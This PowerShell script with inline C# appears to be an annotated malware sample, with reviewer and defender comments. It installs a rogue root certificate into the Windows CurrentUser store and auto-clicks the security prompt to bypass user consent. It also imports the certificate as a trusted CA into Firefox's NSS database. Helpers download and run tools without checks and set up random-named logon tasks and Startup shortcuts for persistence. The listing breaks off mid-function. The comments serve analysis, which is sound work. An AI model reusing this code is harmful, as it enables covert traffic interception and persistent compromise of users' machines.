- # Stage 1: compiles an inline C# helper (Add-Type) that adds the base64 DER certificate
- # substituted for %CERT% to the CurrentUser Trusted Root store and, from a second thread,
- # auto-confirms the Windows security prompt that CurrentUser\Root additions raise.
- # Defender note: a new CA in cert:\CurrentUser\Root and a powershell.exe process that
- # enumerates top-level windows and sends BM_CLICK are the observable artifacts of this stage.
- function IxwlznPssNNPP{
- Add-Type @"
- using System;
- using System.Text;
- using System.Runtime.InteropServices;
- using System.Diagnostics;
- using System.Security.Cryptography.X509Certificates;
- using System.Threading;
- public static class uDWozt
- {
- // Search criteria for the window enumeration plus the matching handle (hWnd), if any.
- public class brNXwO
- {
- public string Wndclass;
- public string Title;
- public string Process;
- public IntPtr hWnd;
- }
- private delegate bool KIzxk(IntPtr hWnd, ref brNXwO data);
- [DllImport("user32.dll")]
- [return: MarshalAs(UnmanagedType.Bool)]
- private static extern bool EnumWindows(KIzxk lpEnumFunc, ref brNXwO data);
- [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
- public static extern int GetClassName(IntPtr hWnd, StringBuilder lpClassName, int nMaxCount);
- [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
- public static extern int GetWindowText(IntPtr hWnd, StringBuilder lpString, int nMaxCount);
- [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
- static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint lpdwProcessId);
- [DllImport("user32.dll")]
- [return: MarshalAs(UnmanagedType.Bool)]
- static extern bool SetForegroundWindow(IntPtr hWnd);
- public delegate bool uDP(IntPtr hwnd, IntPtr lParam);
- [DllImport("user32")]
- [return: MarshalAs(UnmanagedType.Bool)]
- public static extern bool EnumChildWindows(IntPtr window, uDP callback, IntPtr lParam);
- [DllImport("user32.dll", CharSet = CharSet.Auto)]
- static extern IntPtr SendMessage(IntPtr hWnd, UInt32 Msg, IntPtr wParam, IntPtr lParam);
- // Toolhelp32 TH32CS_* snapshot flags; only Process (0x2) is used below.
- [Flags]
- private enum SnapshotFlags : uint
- {
- HeapList = 0x00000001,
- Process = 0x00000002,
- Thread = 0x00000004,
- Module = 0x00000008,
- Module32 = 0x00000010,
- Inherit = 0x80000000,
- All = 0x0000001F,
- NoHeaps = 0x40000000
- }
- //inner struct used only internally
- // Mirrors the Win32 PROCESSENTRY32 layout; szExeFile holds the image file name only (no path).
- [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)]
- private struct PROCESSENTRY32
- {
- const int MAX_PATH = 260;
- internal UInt32 dwSize;
- internal UInt32 cntUsage;
- internal UInt32 th32ProcessID;
- internal IntPtr th32DefaultHeapID;
- internal UInt32 th32ModuleID;
- internal UInt32 cntThreads;
- internal UInt32 th32ParentProcessID;
- internal Int32 pcPriClassBase;
- internal UInt32 dwFlags;
- [MarshalAs(UnmanagedType.ByValTStr, SizeConst = MAX_PATH)]
- internal string szExeFile;
- }
- [DllImport("kernel32", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)]
- static extern IntPtr CreateToolhelp32Snapshot([In]UInt32 dwFlags, [In]UInt32 th32ProcessID);
- [DllImport("kernel32", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)]
- static extern bool Process32First([In]IntPtr hSnapshot, ref PROCESSENTRY32 lppe);
- [DllImport("kernel32", SetLastError = true, CharSet = System.Runtime.InteropServices.CharSet.Auto)]
- static extern bool Process32Next([In]IntPtr hSnapshot, ref PROCESSENTRY32 lppe);
- [DllImport("kernel32", SetLastError = true)]
- [return: MarshalAs(UnmanagedType.Bool)]
- private static extern bool CloseHandle([In] IntPtr hObject);
- // BM_CLICK: sent to a button control it simulates a click.
- const int BM_CL = 0x00F5;
- // Decodes the base64 certificate; Convert.FromBase64String throws FormatException on malformed input,
- // so the null check in the caller is never the path taken for bad data.
- public static byte[] lIxrqOO(String sCert)
- {
- return Convert.FromBase64String(sCert);
- }
- // Adds the certificate to CurrentUser\Root. The watcher thread is started before store.Add so it is
- // already polling for the confirmation dialog when the store raises it; Join blocks until the
- // watcher has found and clicked the dialog, so a cancelled prompt leaves this call waiting on Join.
- public static void MdZnUIVph(String sCert){
- System.Console.WriteLine("[Win32]::Start()");
- byte[] bCert = lIxrqOO(sCert);
- if (bCert != null)
- {
- X509Certificate2 certificate = new X509Certificate2(bCert);
- X509Store store = new X509Store(StoreName.Root, StoreLocation.CurrentUser);
- store.Open(OpenFlags.ReadWrite);
- if (!store.Certificates.Contains(certificate))
- {
- Thread thread = new Thread(jinJTAGRFjJN);
- thread.Start();
- store.Add(certificate);
- thread.Join();
- }
- store.Close();
- }
- }
- // Polls for a top-level window of class #32770 (the standard Windows dialog class) owned by
- // csrss, certutil or powershell, then brings it to the foreground and clicks every child control.
- // NOTE(review): the loop has no Sleep or timeout, so it spins at full CPU and never exits if the
- // dialog never appears; the hWnd=IntPtr.Zero assignment in the else branch is redundant.
- public static void jinJTAGRFjJN()
- {
- System.Console.WriteLine("[Win32]::SearchDialog()");
- IntPtr hWnd;
- do{
- hWnd = UANP("#32770",String.Empty);
- if (!hWnd.Equals(IntPtr.Zero))
- {
- System.Console.WriteLine("Founded hWnd=0x{0:X}",hWnd);
- break;
- }else
- {
- hWnd=IntPtr.Zero;
- System.Console.WriteLine("Try again find window");
- }
- }while (hWnd.Equals(IntPtr.Zero));
- System.Console.WriteLine("Dialog window founded");
- SetForegroundWindow(hWnd);
- uDP childProc = new uDP(Sqvkzka);
- EnumChildWindows(hWnd, childProc, IntPtr.Zero);
- }
- // Runs one EnumWindows pass with the given class/title prefixes; returns the match or IntPtr.Zero.
- public static IntPtr UANP(string wndclass, string title)
- {
- brNXwO sd = new brNXwO();
- sd.Wndclass = wndclass;
- sd.Title = title;
- sd.hWnd=IntPtr.Zero;
- System.Console.WriteLine("EnumWindow -|");
- EnumWindows(new KIzxk(QfEgqbiwLLE), ref sd);
- return sd.hWnd;
- }
- // EnumWindows callback: a window is a candidate when its class or title starts with the requested
- // (non-empty) prefix; it is accepted only if its owning process name contains csrss, certutil or
- // powershell. Returning false stops the enumeration at the first accepted window.
- public static bool QfEgqbiwLLE(IntPtr hWnd, ref brNXwO data)
- {
- StringBuilder title = new StringBuilder(1024);
- StringBuilder className = new StringBuilder(1024);
- GetWindowText(hWnd, title, title.Capacity);
- GetClassName(hWnd, className, className.Capacity);
- String sEN=zlZtvaJq(hWnd).ToLower();
- if((!data.Wndclass.Equals(String.Empty) && className.ToString().StartsWith(data.Wndclass)) || (!data.Title.Equals(String.Empty) && title.ToString().StartsWith(data.Title)))
- {
- System.Console.WriteLine(" |- hWnd=0x{0:X}; Class={1}; Title={2}; Process={3}",hWnd,className.ToString(),title.ToString(),sEN);
- if(sEN.Contains("csrss") || sEN.Contains("certutil") || sEN.Contains("powershell"))
- {
- data.hWnd = hWnd;
- return false;
- }
- }
- return true;
- }
- // Resolves a window's owning executable name by walking a Toolhelp32 process snapshot.
- // Returns null when no entry matches the PID. Note that when sProc is null the caller's
- // ToLower() call throws NullReferenceException inside the EnumWindows callback.
- // NOTE(review): threadID is unused, and CreateToolhelp32Snapshot reports failure with
- // INVALID_HANDLE_VALUE rather than IntPtr.Zero, which is not checked before use.
- public static String zlZtvaJq(IntPtr cQzoivDyDVP){
- uint LSMhtexN = 0;
- uint threadID = GetWindowThreadProcessId(cQzoivDyDVP, out LSMhtexN);
- String sProc = null;
- IntPtr handleToSnapshot = IntPtr.Zero;
- try
- {
- PROCESSENTRY32 uRgD = new PROCESSENTRY32();
- uRgD.dwSize = (UInt32)Marshal.SizeOf(typeof(PROCESSENTRY32));
- handleToSnapshot = CreateToolhelp32Snapshot((uint)SnapshotFlags.Process, 0);
- if (Process32First(handleToSnapshot, ref uRgD))
- {
- do
- {
- if (LSMhtexN == uRgD.th32ProcessID)
- {
- sProc = uRgD.szExeFile;
- break;
- }
- } while (Process32Next(handleToSnapshot, ref uRgD));
- }
- else
- {
- throw new ApplicationException(string.Format("Failed with win32 error code {0}", Marshal.GetLastWin32Error()));
- }
- }
- catch (Exception ex)
- {
- throw new ApplicationException("Can't get the process.", ex);
- }
- finally
- {
- CloseHandle(handleToSnapshot);
- }
- return sProc;
- }
- // EnumChildWindows callback: sends BM_CLICK to every child control, which presses any button
- // in the dialog; always returns true so every child is visited.
- public static bool Sqvkzka(IntPtr hWnd, IntPtr lParam)
- {
- SendMessage(hWnd, BM_CL, IntPtr.Zero, IntPtr.Zero);
- return true;
- }
- }
- "@;
- # %CERT% is a template placeholder, presumably filled in by a builder before deployment.
- [uDWozt]::MdZnUIVph("%CERT%");
- # NOTE(review): exit ends the enclosing script/host when reached, which would stop the later
- # stages from running; how this sample is actually launched is not visible in this listing.
- exit
- }
- # Run stage 1 (Windows CurrentUser\Root certificate install).
- IxwlznPssNNPP
- # Stage 2: compiles an inline C# helper that imports the same base64 certificate into the
- # Firefox NSS certificate database of the first "*.default" profile, marking it as a trusted CA.
- # It loads nss3.dll from the Firefox install directory and resolves NSS_Initialize,
- # CERT_GetDefaultCertDB, CERT_ImportCerts, CERT_ChangeCertTrust, CERT_DestroyCertArray and
- # NSS_Shutdown through GetProcAddress.
- # Defender note: a powershell.exe process loading nss3.dll, and an unexpected CA with trust
- # flags in the profile's cert database, are the observable artifacts of this stage.
- function qWydooxsfcuX{
- Add-Type @"
- using System;
- using System.IO;
- using Microsoft.Win32;
- using System.Runtime.InteropServices;
- using System.ComponentModel;
- public sealed class VvvluVYvCVHZcKJ
- {
- // Lazily created singleton instance (double-checked locking with a volatile field).
- private static volatile VvvluVYvCVHZcKJ bWQOycQsqwujTX;
- private static object FjuSmxcUz = new Object();
- // Returns the singleton, creating it under the lock on first use.
- public static VvvluVYvCVHZcKJ yXpWzzNyofAXFw()
- {
- if (bWQOycQsqwujTX == null)
- {
- lock (FjuSmxcUz)
- {
- if (bWQOycQsqwujTX == null)
- bWQOycQsqwujTX = new VvvluVYvCVHZcKJ();
- }
- }
- return bWQOycQsqwujTX;
- }
- // Status value the NSS calls below return on success (SECSuccess).
- const int GlPtNsgUc=0;
- [DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)]
- static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)]string lpFileName);
- // Loads a native library by path and throws (with the Win32 error attached) when it fails;
- // the returned handle is never zero.
- private static IntPtr sVoGpYpL(string libPath)
- {
- if (String.IsNullOrEmpty(libPath))
- throw new ArgumentNullException("libPath");
- IntPtr moduleHandle = LoadLibrary(libPath);
- if (moduleHandle == IntPtr.Zero)
- {
- int lasterror = Marshal.GetLastWin32Error();
- System.Console.WriteLine(String.Format("Last error: 0x{0:X}",lasterror));
- Win32Exception innerEx = new Win32Exception(lasterror);
- innerEx.Data.Add("LastWin32Error", lasterror);
- throw new Exception("can't load DLL " + libPath, innerEx);
- }
- return moduleHandle;
- }
- [DllImport("kernel32.dll")]
- public static extern IntPtr GetProcAddress(IntPtr hModule, string procedureName);
- //Constants
- // NSS_INIT_* flags as defined by NSS; only NSS_INIT_OPTIMIZESPACE is passed below.
- const uint NSS_INIT_READONLY=0x1;
- const uint NSS_INIT_NOCERTDB = 0x2;
- const uint NSS_INIT_NOMODDB = 0x4;
- const uint NSS_INIT_FORCEOPEN = 0x8;
- const uint NSS_INIT_NOROOTINIT = 0x10;
- const uint NSS_INIT_OPTIMIZESPACE = 0x20;
- const uint NSS_INIT_PK11THREADSAFE = 0x40;
- const uint NSS_INIT_PK11RELOAD = 0x80;
- const uint NSS_INIT_NOPK11FINALIZE = 0x100;
- const uint NSS_INIT_RESERVED = 0x200;
- const uint NSS_INIT_COOPERATE = NSS_INIT_PK11THREADSAFE | NSS_INIT_PK11RELOAD | NSS_INIT_NOPK11FINALIZE | NSS_INIT_RESERVED;
- const string SECMOD_DB = "secmod.db";
- //Structures
- // NSS SECItem: type, data pointer, length.
- [StructLayout(LayoutKind.Sequential)]
- public struct SECItem
- {
- public uint iType;
- public IntPtr bData;
- public uint iDataLen;
- }
- // NSS CERTCertTrust: the three trust-flag words (SSL, e-mail, object signing).
- [StructLayout(LayoutKind.Sequential)]
- private struct CertTrusts
- {
- public int iSite;
- public int iEmail;
- public int iSoft;
- }
- // NSS SECCertUsage; certUsageAnyCA (11) is the value passed to CERT_ImportCerts below.
- private enum SECCertUsage
- {
- certUsageSSLClient = 0,
- certUsageSSLServer = 1,
- certUsageSSLServerWithStepUp = 2,
- certUsageSSLCA = 3,
- certUsageEmailSigner = 4,
- certUsageEmailRecipient = 5,
- certUsageObjectSigner = 6,
- certUsageUserCertImport = 7,
- certUsageVerifyCA = 8,
- certUsageProtectedObjectSigner = 9,
- certUsageStatusResponder = 10,
- certUsageAnyCA = 11
- }
- // NSS_Initialize(configdir, certPrefix, keyPrefix, secmodName, flags), resolved at call time.
- [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
- private delegate int SAHQOjSKIQuqauu(string sConfigDir, string certPrefix, string keyPrefix, string secModName, uint flags);
- private int jMqvNrdsjLvv(string sConfigDir, string certPrefix, string keyPrefix, string secModName, uint flags)
- {
- IntPtr pProc = GetProcAddress(xHkdzDjqqFO, "NSS_Initialize");
- SAHQOjSKIQuqauu ptr = (SAHQOjSKIQuqauu)Marshal.GetDelegateForFunctionPointer(pProc, typeof(SAHQOjSKIQuqauu));
- return ptr(sConfigDir, certPrefix, keyPrefix, secModName, flags);
- }
- // CERT_GetDefaultCertDB(): handle to the default certificate database.
- [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
- private delegate IntPtr NIYpPCjCBxFfBC();
- private IntPtr CNdGzRYooz()
- {
- IntPtr pProc = GetProcAddress(xHkdzDjqqFO, "CERT_GetDefaultCertDB");
- NIYpPCjCBxFfBC ptr = (NIYpPCjCBxFfBC)Marshal.GetDelegateForFunctionPointer(pProc, typeof(NIYpPCjCBxFfBC));
- return ptr();
- }
- // NSS_Shutdown().
- [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
- private delegate IntPtr sTBBLA();
- private IntPtr jYJvrdt()
- {
- IntPtr pProc = GetProcAddress(xHkdzDjqqFO, "NSS_Shutdown");
- sTBBLA ptr = (sTBBLA)Marshal.GetDelegateForFunctionPointer(pProc, typeof(sTBBLA));
- return ptr();
- }
- // CERT_ImportCerts(certdb, usage, ncerts, derCerts, retCerts, keepCerts, caOnly, nickname).
- [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
- private delegate int mxfz(IntPtr certdb, int usage, uint ncerts, ref SECItem[] derCerts, ref IntPtr retCerts, uint keepCerts, uint caOnly, IntPtr nickname);
- private int zAkHNfkzyckVBxn(IntPtr certdb, int usage, uint ncerts, ref SECItem[] derCerts, ref IntPtr retCerts, uint keepCerts, uint caOnly, IntPtr nickname)
- {
- IntPtr pProc = GetProcAddress(xHkdzDjqqFO, "CERT_ImportCerts");
- mxfz ptr = (mxfz)Marshal.GetDelegateForFunctionPointer(pProc, typeof(mxfz));
- return ptr(certdb, usage, ncerts, ref derCerts, ref retCerts, keepCerts, caOnly, nickname);
- }
- // CERT_ChangeCertTrust(certdb, cert, trust).
- // NOTE(review): unlike the other delegates this one carries no UnmanagedFunctionPointer(Cdecl)
- // attribute, so it defaults to the platform convention; on x86 that differs from the cdecl the
- // siblings declare, on x64 there is no difference.
- private delegate int UJdXr(IntPtr certdb, IntPtr cert, ref CertTrusts trust);
- private int rJbhRgnUdJYH(IntPtr certdb, IntPtr cert, ref CertTrusts trust)
- {
- IntPtr pProc = GetProcAddress(xHkdzDjqqFO, "CERT_ChangeCertTrust");
- UJdXr ptr = (UJdXr)Marshal.GetDelegateForFunctionPointer(pProc, typeof(UJdXr));
- return ptr(certdb, cert, ref trust);
- }
- // CERT_DestroyCertArray(certs, ncerts).
- [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
- public delegate int BxDVnEb(IntPtr cert, uint ncerts);
- private int GMMnJgiwqS(IntPtr cert, uint ncerts)
- {
- IntPtr pProc = GetProcAddress(xHkdzDjqqFO, "CERT_DestroyCertArray");
- BxDVnEb ptr = (BxDVnEb)Marshal.GetDelegateForFunctionPointer(pProc, typeof(BxDVnEb));
- return ptr(cert, ncerts);
- }
- // Module handle of nss3.dll once loaded; every GetProcAddress above reads it.
- private IntPtr xHkdzDjqqFO = IntPtr.Zero;
- // Entry point: locates the profile and install directory, loads every DLL in the install
- // directory (so nss3.dll's dependencies resolve), initialises NSS on the profile, imports the
- // DER certificate and sets its trust flags. Returns false on the explicit failure branches.
- // NOTE(review): diInstallPath can still be null at the SetCurrentDirectory call, which is then
- // caught by the outer catch; the catch path falls through to "return true"; the AllocHGlobal
- // buffer is never freed; the three String.Format error messages use {0:X} twice, so the
- // last-error argument is never printed; and every early return after NSS_Initialize calls
- // NSS_Shutdown once itself and again from finally.
- public Boolean yXKVDNlNplVzraF(String sCert){
- System.Console.WriteLine(String.Format("VvvluVYvCVHZcKJ Start. Process {0}-bit",IntPtr.Size * 8));
- String sProfile = GetProfile();
- if (String.IsNullOrEmpty(sProfile))
- {
- System.Console.WriteLine("Profile not found");
- return false;
- }
- System.Console.WriteLine("Profile path="+sProfile);
- byte[] bCert = GetCertAsByteArray(sCert);
- IntPtr ipCert = Marshal.AllocHGlobal(bCert.Length);
- System.Console.WriteLine("Unpack cert OK");
- try
- {
- DirectoryInfo diInstallPath = GetIP();
- if (diInstallPath == null)
- {
- System.Console.WriteLine("diInstallPath is null");
- // Fallback when the registry lookup yields nothing: the two default install locations.
- String ffexe = @"C:\Program Files\Mozilla Firefox\firefox.exe";
- if (File.Exists(ffexe))
- {
- diInstallPath = new DirectoryInfo(Path.GetDirectoryName(ffexe));
- System.Console.WriteLine("Path found: "+Path.GetDirectoryName(ffexe));
- }
- else
- {
- ffexe = @"C:\Program Files (x86)\Mozilla Firefox\firefox.exe";
- if (File.Exists(ffexe))
- {
- diInstallPath = new DirectoryInfo(Path.GetDirectoryName(ffexe));
- System.Console.WriteLine("Path found: "+Path.GetDirectoryName(ffexe));
- }
- }
- }
- String sCurrentDirectory = Directory.GetCurrentDirectory();
- // The current directory is switched to the install directory so LoadLibrary resolves
- // the NSS dependency DLLs by bare name; it is restored after nss3.dll is loaded.
- Directory.SetCurrentDirectory(diInstallPath.FullName);
- System.Console.WriteLine("Install path="+diInstallPath.FullName);
- foreach(FileInfo fiDll in diInstallPath.GetFiles("*.dll"))
- {
- if (fiDll.Name.Equals("breakpadinjector.dll")) continue;
- try{
- sVoGpYpL(fiDll.FullName);
- }catch (Exception ex){
- System.Console.WriteLine(String.Format("{0} {1} {2}", ex.Source, ex.Message, ex.StackTrace));
- }
- }
- xHkdzDjqqFO = sVoGpYpL(diInstallPath.FullName + "\\nss3.dll");
- if (xHkdzDjqqFO.Equals(IntPtr.Zero))
- {
- System.Console.WriteLine("Firefox install directory not found");
- return false;
- }
- System.Console.WriteLine("Init dlls OK");
- Directory.SetCurrentDirectory(sCurrentDirectory);
- //Init cert
- Marshal.Copy(bCert, 0, ipCert, bCert.Length);
- SECItem CertItem = new SECItem();
- // iType 3 corresponds to siDERCertBuffer in NSS's SECItemType.
- CertItem.iType = 3;
- CertItem.bData = ipCert;
- CertItem.iDataLen = (uint)bCert.Length;
- SECItem[] aCertItem = new SECItem[1];
- aCertItem[0] = CertItem;
- CertTrusts CertTrust = new CertTrusts();
- // 0x10 matches NSS's CERTDB_TRUSTED_CA flag, set for SSL, e-mail and object signing alike.
- CertTrust.iSite = 0x10;
- CertTrust.iEmail = 0x10;
- CertTrust.iSoft = 0x10;
- System.Console.WriteLine("Init cert OK");
- //End init cert
- // "sql:" selects the SQLite-backed profile database (cert9.db/key4.db).
- int status = jMqvNrdsjLvv("sql:"+sProfile, "", "", SECMOD_DB, NSS_INIT_OPTIMIZESPACE);
- if (status != GlPtNsgUc)
- {
- System.Console.WriteLine(String.Format("NSS_InitReadWrite ERROR. Status: 0x{0:X};Last error: 0x{0:X}", status, Marshal.GetLastWin32Error()));
- return false;
- }
- IntPtr bd = CNdGzRYooz();
- if (bd == IntPtr.Zero)
- {
- System.Console.WriteLine("CERT_GetDefaultCertDB Failed");
- jYJvrdt();
- return false;
- }
- System.Console.WriteLine("CERT_GetDefaultCertDB OK");
- IntPtr CertToImport = new IntPtr();
- IntPtr[] aCertToImport = new IntPtr[1];
- // usage 11 = certUsageAnyCA, ncerts 1, keepCerts 1 (store permanently), caOnly 0.
- status = zAkHNfkzyckVBxn(bd, 11, 1, ref aCertItem, ref CertToImport, 1, 0, IntPtr.Zero);
- if (status != GlPtNsgUc)
- {
- System.Console.WriteLine(String.Format("CERT_ImportCerts ERROR. Status: 0x{0:X};Last error: 0x{0:X}", status, Marshal.GetLastWin32Error()));
- jYJvrdt();
- return false;
- }
- System.Console.WriteLine("CERT_ImportCerts OK");
- // retCerts points at an array of one CERTCertificate pointer; copy out the first entry.
- Marshal.Copy(CertToImport, aCertToImport, 0, 1);
- status = rJbhRgnUdJYH(bd, aCertToImport[0], ref CertTrust);
- if ( status != GlPtNsgUc)
- {
- System.Console.WriteLine(String.Format("CERT_ChangeCertTrust ERROR. Status: 0x{0:X};Last error: 0x{0:X}", status, Marshal.GetLastWin32Error()));
- jYJvrdt();
- return false;
- };
- System.Console.WriteLine("CERT_ChangeCertTrust OK");
- GMMnJgiwqS(CertToImport, 1);
- System.Console.WriteLine("Add cert OK");
- }
- catch (Exception ex){
- System.Console.WriteLine(String.Format("{0} {1} {2}", ex.Source, ex.Message, ex.StackTrace));
- }
- finally
- {
- jYJvrdt();
- }
- return true;
- }
- // Returns the first "*.default" directory under APPDATA\Mozilla\Firefox\Profiles, or "".
- private String GetProfile()
- {
- String FFProfile = Path.Combine(Environment.GetEnvironmentVariable("APPDATA"), @"Mozilla\Firefox\Profiles");
- if (Directory.Exists(FFProfile))
- {
- if (Directory.GetDirectories(FFProfile, "*.default").Length > 0)
- {
- return Directory.GetDirectories(FFProfile, "*.default")[0];
- }
- }
- return "";
- }
- // Base64-decodes the certificate; logs and returns null on failure (the caller dereferences
- // the result without a null check).
- public byte[] GetCertAsByteArray(String sCert)
- {
- try
- {
- return Convert.FromBase64String(sCert);
- }
- catch (Exception ex){
- System.Console.WriteLine(String.Format("{0} {1} {2}", ex.Source, ex.Message, ex.StackTrace));
- }
- return null;
- }
- // Reads the Firefox install directory from HKLM\SOFTWARE\Mozilla\Mozilla Firefox\<first version>\Main,
- // trying the Wow6432Node view second. Returns null when neither key exists or the read fails.
- // NOTE(review): the two inline comments below have the views swapped (Wow6432Node is the
- // 32-bit-on-64-bit view); the opened RegistryKey objects are never disposed.
- private DirectoryInfo GetIP()
- {
- DirectoryInfo fp = null;
- // get firefox path from registry
- // we'll search the 32bit install location
- RegistryKey localMachine1 = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Mozilla\Mozilla Firefox", false);
- // and lets try the 64bit install location just in case
- RegistryKey localMachine2 = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox", false);
- if (localMachine1 != null)
- {
- try
- {
- string[] installedVersions = localMachine1.GetSubKeyNames();
- // we'll take the first installed version, people normally only have one
- if (installedVersions.Length == 0)
- throw new IndexOutOfRangeException("No installs of firefox recorded in its key.");
- RegistryKey mainInstall = localMachine1.OpenSubKey(installedVersions[0]);
- // get install directory
- string installString = (string)mainInstall.OpenSubKey("Main").GetValue("Install Directory", null);
- if (installString == null)
- throw new NullReferenceException("Install string was null");
- fp = new DirectoryInfo(installString);
- }
- catch (Exception ex)
- {
- System.Console.WriteLine(String.Format("{0} {1} {2}", ex.Source, ex.Message, ex.StackTrace));
- }
- }
- else if (localMachine2 != null)
- {
- try
- {
- string[] installedVersions = localMachine2.GetSubKeyNames();
- // we'll take the first installed version, people normally only have one
- if (installedVersions.Length == 0)
- throw new IndexOutOfRangeException("No installs of firefox recorded in its key.");
- RegistryKey mainInstall = localMachine2.OpenSubKey(installedVersions[0]);
- // get install directory
- string installString = (string)mainInstall.OpenSubKey("Main").GetValue("Install Directory", null);
- if (installString == null)
- throw new NullReferenceException("Install string was null");
- fp = new DirectoryInfo(installString);
- }
- catch (Exception ex)
- {
- System.Console.WriteLine(String.Format("{0} {1} {2}", ex.Source, ex.Message, ex.StackTrace));
- }
- }else{
- System.Console.WriteLine("Registry records not found");
- }
- return fp;
- }
- }
- "@;
- # %CERT% is the same template placeholder used by stage 1.
- [VvvluVYvCVHZcKJ]::yXpWzzNyofAXFw().yXKVDNlNplVzraF("%CERT%");
- }
- # Run stage 2 (Firefox NSS certificate import).
- qWydooxsfcuX
- # Scheduler back-end selector: 1 = built-in ScheduledTasks module, 2 = the downloaded
- # Microsoft.Win32.TaskScheduler assembly (see InitScheduller / FqCZvVAFIWkCT).
- $SH_TYPE_SCHEDULED_TASK=1;
- $SH_TYPE_TASK_SCHEDULER=2;
- $schedulerType=$SH_TYPE_SCHEDULED_TASK;
- # Extracts $zipfile into $destination. Uses 7za.exe from ALLUSERSPROFILE (ProgramData),
- # downloading it from chocolatey.org when absent, and falls back to the Shell.Application
- # COM copyhere method when the binary is still unavailable.
- # NOTE(review): the download failure is silently swallowed by the empty Catch, and the
- # fetched binary is executed without any integrity check.
- # Defender note: 7za.exe appearing in ProgramData is an artifact of this routine.
- function mWwT
- {
- param([string]$zipfile, [string]$destination);
- $7z = Join-Path $env:ALLUSERSPROFILE '7za.exe';
- if (-NOT (Test-Path $7z)){
- Try
- {
- (New-Object System.Net.WebClient).DownloadFile('https://chocolatey.org/7za.exe',$7z);
- }
- Catch{}
- }
- if ($(Try { Test-Path $7z.trim() } Catch { $false })){
- Start-Process "$7z" -ArgumentList "x -o`"$destination`" -y `"$zipfile`"" -Wait -NoNewWindow
- }
- else{
- $shell = new-object -com shell.application;
- $zip = $shell.NameSpace($zipfile);
- foreach($item in $zip.items())
- {
- $shell.Namespace($destination).copyhere($item);
- }
- }
- }
- # Creates a .lnk at $dest_path pointing at $target_path via WScript.Shell, creating the
- # parent directory if needed. Does nothing when the target is missing or the .lnk already
- # exists. Called below to drop shortcuts into the user's Startup folder.
- function Add-Shortcut{
- param([string]$target_path, [string]$dest_path, [string]$work_path, [string]$arguments="");
- $_path=Split-Path $dest_path;
- if (-Not (Test-Path $_path)){
- mkdir -Force $_path;
- }
- if (-Not (Test-Path $target_path)){
- Write-Output "Can't add shortcut. Target path '$target_path' not found.";
- return;
- }
- if ((Test-Path $dest_path)){
- Write-Output "Can't add shortcut. Destination path '$dest_path' exist.";
- return;
- }
- $_shell = New-Object -ComObject ("WScript.Shell");
- $_shortcut = $_shell.CreateShortcut($dest_path);
- $_shortcut.TargetPath=$target_path;
- if(-Not [String]::IsNullOrEmpty($arguments)){
- $_shortcut.Arguments=$arguments;
- }
- $_shortcut.WorkingDirectory=$work_path;
- $_shortcut.Save();
- }
- # Writes the base64-decoded $string to $file. No caller is visible in this listing.
- function Base64ToFile
- {
- param([string]$file, [string]$string);
- $bytes=[System.Convert]::FromBase64String($string);
- #set-content -encoding byte $file -value $bytes;
- [IO.File]::WriteAllBytes($file, $bytes);
- }
- # Returns a random alphanumeric string whose length is in [$min, $max) (Get-Random's
- # -Maximum is exclusive). Because -Count samples the 62-character pool without
- # replacement, no character repeats within one result. Used for file, directory and
- # task names throughout the script.
- function RandomString{
- param([int]$min=5, [int]$max=15);
- return (-join ((48..57)+(65..90)+(97..122) | Get-Random -Count (Get-Random -minimum $min -maximum $max) | % {[char]$_}));
- }
- # Picks the scheduler back-end. Prefers the built-in ScheduledTasks module; when that
- # import fails, downloads the TaskScheduler NuGet package into a random %TEMP% directory,
- # extracts it and loads lib\net20\Microsoft.Win32.TaskScheduler.dll by reflection.
- # NOTE(review): the download is retried in an empty while loop with no delay or cap.
- function InitScheduller{
- try{
- Import-Module ScheduledTasks -ErrorAction Stop;
- return $SH_TYPE_SCHEDULED_TASK;
- }catch{
- $File=$env:Temp+'\'+(RandomString)+'.zip';
- $Dest=$env:Temp+'\'+(RandomString);
- while (!(nne 'https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg' $File)) {}
- if ((Test-Path $Dest) -eq 1){Remove-Item -Force -Recurse $Dest;}mkdir $Dest | Out-Null;
- mWwT $File $Dest;
- Remove-Item -Force $File;
- $TSAssembly=$Dest+'\lib\net20\Microsoft.Win32.TaskScheduler.dll';
- $loadLib = [System.Reflection.Assembly]::LoadFile($TSAssembly);
- return $SH_TYPE_TASK_SCHEDULER;
- }
- }
- # Registers and immediately starts a scheduled task named $name that runs $cmd $params in
- # $dir at every logon of the current user; with $restart=1 it also repeats every minute
- # (20 years via the module, unbounded via the TaskScheduler assembly). Battery-related
- # stop/start restrictions are disabled. The back-end is chosen by $schedulerType, which is
- # read from the caller's scope.
- # NOTE(review): `-Not $delay -eq 0` parses as `(-not $delay) -eq 0`; it yields the
- # intended result only through PowerShell's bool/int comparison rules.
- # Defender note: the resulting tasks are the persistence artifacts of this sample; the task
- # names and descriptions are random strings.
- function FqCZvVAFIWkCT
- {
- param([string]$name, [string]$cmd, [string]$params='',[int]$restart=0,[int]$delay=0,[string]$dir='');
- switch ($schedulerType) {
- $SH_TYPE_SCHEDULED_TASK {
- $Action = New-ScheduledTaskAction -Execute $cmd;
- if(-Not [String]::IsNullOrEmpty($params)){
- $Action.Arguments=$params;
- }
- if(-Not [String]::IsNullOrEmpty($dir)){
- $Action.WorkingDirectory=$dir;
- }
- $LogonTrigger = New-ScheduledTaskTrigger -AtLogOn;
- # Property name differs across module versions; try UserId first, then User.
- try{
- $LogonTrigger.UserId=$env:username;
- }catch{
- $LogonTrigger.User=$env:username;
- }
- if(-Not $delay -eq 0){
- $LogonTrigger.Delay=New-TimeSpan -Seconds $delay;
- }
- if($restart -eq 1){
